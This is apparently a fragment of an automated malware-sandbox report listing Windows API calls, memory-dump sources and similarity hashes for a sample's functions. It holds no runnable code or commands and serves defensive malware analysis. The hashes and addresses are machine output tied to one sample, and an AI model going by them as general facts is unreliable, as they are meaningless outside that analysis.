                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                                              • String ID:
                                                                              • API String ID: 4011626565-0
                                                                              • Opcode ID: ea3eed7d1408edc3882bc6792a8114668d7e879bec7624fad3ea01842ef17e57
                                                                              • Instruction ID: 951735f7a3c6dd48f486321ddf7fb9c00a217b4e97ee71939f184256b73d479b
                                                                              • Opcode Fuzzy Hash: ea3eed7d1408edc3882bc6792a8114668d7e879bec7624fad3ea01842ef17e57
                                                                              • Instruction Fuzzy Hash: 2B41A871A00A58AFCB10EF65DC45ADDB7B8EB88706F4044BAF404B7381E67C9F488E59
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,004641B3), ref: 00464041
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,0046417E,?,00000001,00000000,004641B3), ref: 00464087
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00464160,?,00000000,?,00000000,0046417E,?,00000001,00000000,004641B3), ref: 0046413C
                                                                              • FindClose.KERNEL32(000000FF,00464167,00464160,?,00000000,?,00000000,0046417E,?,00000001,00000000,004641B3), ref: 0046415A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                                              • String ID:
                                                                              • API String ID: 4011626565-0
                                                                              • Opcode ID: 178f21a278dbeca0b5487afb4cc8a3a474e9964bec91cf1fa54baf1df103d301
                                                                              • Instruction ID: 3e1e9a66f2526eb02ce93895e5fa1006c5947d115418489384634c6f5ce8cf05
                                                                              • Opcode Fuzzy Hash: 178f21a278dbeca0b5487afb4cc8a3a474e9964bec91cf1fa54baf1df103d301
                                                                              • Instruction Fuzzy Hash: 7341A434B00A58AFCF11EF65CC859DEB7B9EBC8305F4044AAF804A7341E6389E848E49
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                              • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 1177325624-0
                                                                              • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                              • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                              • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                              • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 0048345E
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0048347C
                                                                              • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048293A,0048296E,00000000,0048298E,?,?,?,0049C0A4), ref: 0048349E
                                                                              • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048293A,0048296E,00000000,0048298E,?,?,?,0049C0A4), ref: 004834B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$IconicLong
                                                                              • String ID:
                                                                              • API String ID: 2754861897-0
                                                                              • Opcode ID: 7adc6d23a2e45bfcb47f86f15328f2256524f13007b9a6bd5233fe1c8f26e82e
                                                                              • Instruction ID: b2d3f2bb309dc3ccac68fe08692f7b65e7038161d92c55b9b58b225abec03440
                                                                              • Opcode Fuzzy Hash: 7adc6d23a2e45bfcb47f86f15328f2256524f13007b9a6bd5233fe1c8f26e82e
                                                                              • Instruction Fuzzy Hash: 750152706012409AE601BFE59D8AB5A26C55F10F49F18087BB9009F2A2DA2DDA858B1C
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00462698), ref: 0046261C
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00462678,?,00000000,?,00000000,00462698), ref: 00462658
                                                                              • FindClose.KERNEL32(000000FF,0046267F,00462678,?,00000000,?,00000000,00462698), ref: 00462672
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: e94515bc2c8b3d54fda8ee7ea50903a5de584af26bf4ddc4af921dcd62f8e3d1
                                                                              • Instruction ID: 64bef34161faf0391a99b618d3e767a3fd2d5c762390acd0a64fbb4d401bfb5a
                                                                              • Opcode Fuzzy Hash: e94515bc2c8b3d54fda8ee7ea50903a5de584af26bf4ddc4af921dcd62f8e3d1
                                                                              • Instruction Fuzzy Hash: E921D831904B147ECB11EB65DC41ADEB7ACDB49304F5084F7F808E22A1E6B89E548F5A
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 004241E4
                                                                              • SetActiveWindow.USER32(?,?,?,0046CBC7), ref: 004241F1
                                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023425AC,0042420A,?,?,?,0046CBC7), ref: 00423B4F
                                                                              • SetFocus.USER32(00000000,?,?,?,0046CBC7), ref: 0042421E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveFocusIconicShow
                                                                              • String ID:
                                                                              • API String ID: 649377781-0
                                                                              • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                              • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                              • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                              • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID:
                                                                              • API String ID: 568898626-0
                                                                              • Opcode ID: 76c66e33316401a89d3facc50d11a2b6f1ba08a7ab00baf439cd89f832e1e53a
                                                                              • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                              • Opcode Fuzzy Hash: 76c66e33316401a89d3facc50d11a2b6f1ba08a7ab00baf439cd89f832e1e53a
                                                                              • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureIconic
                                                                              • String ID:
                                                                              • API String ID: 2277910766-0
                                                                              • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                              • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                              • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                              • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 0042419B
                                                                                • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                              • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                              • String ID:
                                                                              • API String ID: 2671590913-0
                                                                              • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                              • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                              • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                              • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                              • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                              • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                              • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047872E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 10ca812e3c548e1abffc20113ea3ec26250c704f28d0c7929afa756ed2071b4a
                                                                              • Instruction ID: 93be4e423146f0b72d2fb04b2818289b08cc6f156d75f667f85849a608f59376
                                                                              • Opcode Fuzzy Hash: 10ca812e3c548e1abffc20113ea3ec26250c704f28d0c7929afa756ed2071b4a
                                                                              • Instruction Fuzzy Hash: 81416979604104EFCB10CF99D6889AAB7F5FB48310B74C5AAE809EB701DB38EE41DB55
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D097
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                              • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                              • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                              • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D988,?,0046DB69), ref: 0045D0AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                              • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                              • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                              • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3875145602.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000001.00000002.3875127821.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3875164858.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                              • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3875145602.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000001.00000002.3875127821.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3875164858.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                              • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                                • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                              • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498762), ref: 0044B67F
                                                                              • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                              • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                              • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                              • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                              • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                              • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                              • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                              • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
